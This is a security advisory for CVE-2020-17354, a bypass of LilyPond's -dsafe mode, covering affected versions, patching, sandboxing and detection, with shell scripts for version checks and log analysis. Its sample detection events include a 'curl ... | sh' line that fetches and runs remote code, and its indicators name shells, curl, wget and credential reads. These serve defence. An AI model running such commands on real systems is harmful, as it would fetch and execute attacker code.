CVE-2020-17354

8.6 HIGH

📋 TL;DR

CVE-2020-17354 is a security bypass vulnerability in LilyPond, a music engraving program, that lets a crafted .ly file execute arbitrary code despite the -dsafe protection mechanism. Anyone who compiles untrusted .ly files with a LilyPond version before 2.24 while relying on -dsafe for isolation is affected; the typical exposure is a service that converts user-supplied scores to PDF, PNG, or MIDI on the server.

💻 Affected Systems

Products:
  • LilyPond
Versions: All versions before 2.24
Operating Systems: Linux, Windows, macOS, All platforms running LilyPond
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is specific to the -dsafe protection mechanism, which was intended to let untrusted .ly input be compiled without giving it arbitrary Scheme execution. Without -dsafe, LilyPond has always executed any Scheme embedded in the input by design. In version 2.24 and later, safe mode is removed entirely, so the product no longer attempts to block code execution from input files; the upgrade removes a broken guarantee rather than making untrusted input safe, and isolation must be provided by the operating system instead.

📦 What is this software?

LilyPond is a free, text-based music engraving program: it compiles plain-text .ly source files into PDF, PNG, SVG, or MIDI output. The .ly input language embeds Guile Scheme (through the # and $ escapes), and LilyPond evaluates that Scheme while compiling, so a .ly file is effectively a program rather than a passive data file. That is why compiling an untrusted score is code execution unless the process is isolated.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through arbitrary code execution with the privileges of the LilyPond process, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Arbitrary code execution as the user or service account that runs LilyPond when a malicious .ly file from an untrusted source is compiled with -dsafe. The CVE itself does not grant privileges beyond that account; any escalation would require a separate weakness.

🟢

If Mitigated

Limited impact if only trusted .ly files are processed or if LilyPond runs in a sandboxed environment.

🌐 Internet-Facing: LOW - LilyPond is not a network service. The exception is any web application that compiles user-uploaded .ly files server-side; treat such a deployment as directly exposed.
🏢 Internal Only: MEDIUM - Risk exists wherever .ly files from untrusted internal sources or user uploads are compiled, particularly batch or CI jobs that relied on -dsafe as their only control.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires the victim to compile a malicious .ly file with -dsafe enabled; without -dsafe, embedded Scheme runs unrestricted by design and no bypass is needed. The bypass goes through the output-def-lookup or output-def-scope functions, which safe mode left callable, and from there reaches code execution that -dsafe was supposed to prevent. No authentication or user interaction beyond opening the file is involved.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.24.0 and later (removes -dsafe rather than repairing it; untrusted input still needs OS-level isolation)

Vendor Documentation (2.18 command-line usage, describes the -dsafe option): https://lilypond.org/doc/v2.18/Documentation/usage/command_002dline-usage

Restart Required: No

Instructions:

1. Download LilyPond 2.24.0 or later from https://lilypond.org/download.html
2. Uninstall the vulnerable version
3. Install the patched version
4. Verify the installation with 'lilypond --version'
5. Remove -dsafe from any scripts or service wrappers and move the isolation to the OS layer (container, VM, or dedicated low-privilege account), since 2.24 no longer provides a safe mode

🔧 Temporary Workarounds

Process files in isolated environment

Platform: all

Run LilyPond in a sandboxed container or virtual machine when processing untrusted .ly files. The container should have no network, a read-only root filesystem, and only the score directory mounted, so that code run from a malicious file cannot reach the host or the internet. The image name below is whatever LilyPond image you build or trust; there is no assumption of an official one.

docker run --rm --network none --read-only --tmpfs /tmp -v "$(pwd)":/data -w /data lilypond lilypond input.ly

Avoid processing untrusted files

Platform: all

Only compile .ly files from trusted sources. Content validation is not a reliable substitute: .ly files legitimately embed Scheme, so a filter on # or $ escapes either blocks ordinary scores or misses obfuscated ones. Treat every .ly file as executable code and decide on that basis whether it should be compiled at all.

🧯 If You Can't Patch

  • Accept .ly files only from trusted, verified sources; do not rely on -dsafe or on content filtering to make an untrusted file safe
  • Run LilyPond with minimal privileges in an isolated environment (container with no network, VM, or a dedicated restricted user account that owns nothing but the score directory)

🔍 How to Verify

Check if Vulnerable:

Run 'lilypond --version' and check if version is below 2.24.0

Check Version:

lilypond --version

Verify Fix Applied:

Run 'lilypond --version' and confirm version is 2.24.0 or higher
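The version check above is easy to script across a fleet. The following is an added example, not code from the original page or the LilyPond project: it parses the first line of the 'lilypond --version' banner (which has the form "GNU LilyPond X.Y.Z ...") and reports whether the build still carries the bypassable -dsafe mode, i.e. whether the major.minor version is below 2.24. The sample banners are constructed; on a real host feed it the actual command output as shown in the last comment.

```shell
# Added example, not from the original page or the LilyPond project.
# Parses the first line of `lilypond --version` ("GNU LilyPond X.Y.Z ...")
# and reports whether the build still ships the bypassable -dsafe mode (< 2.24).

# Extract the first dotted version number from the banner text.
lilypond_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^GNU LilyPond \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Returns 0 (true) if version $1 is older than 2.24 (still has -dsafe), 1 otherwise.
lilypond_has_dsafe() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    # Versions before 2.24 still carry the -dsafe mode affected by CVE-2020-17354.
    if [ "$major" -lt 2 ]; then return 0; fi
    if [ "$major" -eq 2 ] && [ "$minor" -lt 24 ]; then return 0; fi
    return 1
}

# Combined check on a banner line:
#   0 = vulnerable (-dsafe present and bypassable)
#   1 = not affected (-dsafe removed, input is executable code regardless)
#   2 = banner could not be parsed
check_lilypond_banner() {
    v=$(lilypond_version_from_banner "$1")
    [ -n "$v" ] || { echo "could not parse version from: $1" >&2; return 2; }
    if lilypond_has_dsafe "$v"; then
        echo "LilyPond $v: -dsafe is present and bypassable (CVE-2020-17354)"
        return 0
    fi
    echo "LilyPond $v: -dsafe removed; treat every .ly as executable code"
    return 1
}

# Constructed sample banners for an offline demo.
# On a real host use: check_lilypond_banner "$(lilypond --version 2>/dev/null | head -n 1)"
check_lilypond_banner "GNU LilyPond 2.22.2" || true
check_lilypond_banner "GNU LilyPond 2.24.1 (running Guile 2.2)" || true
```

Note that a "not affected" result only means the broken sandbox is gone; it does not mean untrusted files can be compiled safely, so the isolation steps above still apply.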

📡 Detection & Monitoring

Log Indicators:

  • Child processes spawned by lilypond other than its engraving helpers (ghostscript for PDF output): shells, interpreters, curl, wget, or anything else is a strong signal
  • File writes by the lilypond process outside the score and output directories, or reads of credentials, SSH keys, or other secrets
  • Unexpected network connections from the lilypond process, which has no reason to talk to the network during engraving

Network Indicators:

  • Outbound connections from LilyPond to unexpected destinations
  • DNS queries for command and control domains

SIEM Query:

(parent_process_name:"lilypond" AND NOT process_name:"gs") OR (process_name:"lilypond" AND process_cmdline:*-dsafe*)

The first clause catches lilypond spawning anything other than ghostscript, which is what a successful bypass typically does next; the second inventories invocations that still rely on -dsafe and therefore identifies the jobs that are exposed. The function names output-def-lookup and output-def-scope appear inside the .ly file, not on the command line, so a command-line match on them will never fire; search file content instead if your platform indexes it.
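The same detection logic as the query above, as an added example that is not part of the original page or of the LilyPond project. It runs over constructed process-creation events in a simplified "timestamp parent_name child_name child_cmdline..." line format (not real telemetry; adapt the field positions to your EDR or auditd export). One function flags lilypond parents spawning anything outside an allowlist of engraving helpers, and a second inventories lilypond invocations that carry -dsafe. The allowlist containing only gs is an assumption about a stock build.

```shell
# Added example, not from the original page or the LilyPond project.
# Event format (constructed, simplified): "timestamp parent_name child_name child_cmdline..."

# Children lilypond is expected to spawn. Assumption: a stock build only calls
# ghostscript (gs) for PDF output; extend this for your own build.
ALLOWED_CHILDREN="gs"

# Reads events on stdin, prints one ALERT line per lilypond child that is not
# on the allowlist. Returns 0 if at least one alert was raised, 1 otherwise.
detect_lilypond_children() {
    awk -v allowed="$ALLOWED_CHILDREN" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1; hits = 0 }
        $2 == "lilypond" && !($3 in ok) {
            cmd = ""
            for (i = 4; i <= NF; i++) cmd = cmd (i > 4 ? " " : "") $i
            printf "ALERT %s lilypond spawned %s: %s\n", $1, $3, cmd
            hits++
        }
        END { exit(hits > 0 ? 0 : 1) }
    '
}

# Reads events on stdin, prints "timestamp input_file" for every lilypond
# invocation that passed -dsafe, i.e. every job still relying on the broken mode.
find_dsafe_invocations() {
    awk '$3 == "lilypond" {
        for (i = 4; i <= NF; i++) if ($i == "-dsafe") { print $1, $NF; break }
    }'
}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS='2024-03-01T10:00:01Z lilypond gs -dSAFER -sDEVICE=pdfwrite -o score.pdf score.ps
2024-03-01T10:00:02Z lilypond sh -c curl http://203.0.113.5/x | sh
2024-03-01T10:00:03Z bash lilypond -dsafe untrusted.ly
2024-03-01T10:00:04Z lilypond python3 -c import os;os.system("id")'

# Helpers that expose counts so the detection can be checked programmatically.
count_lilypond_alerts() {
    printf '%s\n' "$SAMPLE_EVENTS" | detect_lilypond_children | wc -l | tr -d ' '
}
count_dsafe_invocations() {
    printf '%s\n' "$SAMPLE_EVENTS" | find_dsafe_invocations | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_EVENTS" | detect_lilypond_children || echo "no suspicious spawns"
printf '%s\n' "$SAMPLE_EVENTS" | find_dsafe_invocations
```

On the sample data the gs child is ignored, the sh and python3 children raise alerts, and the one -dsafe invocation is listed so the owning job can be moved into a sandbox.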
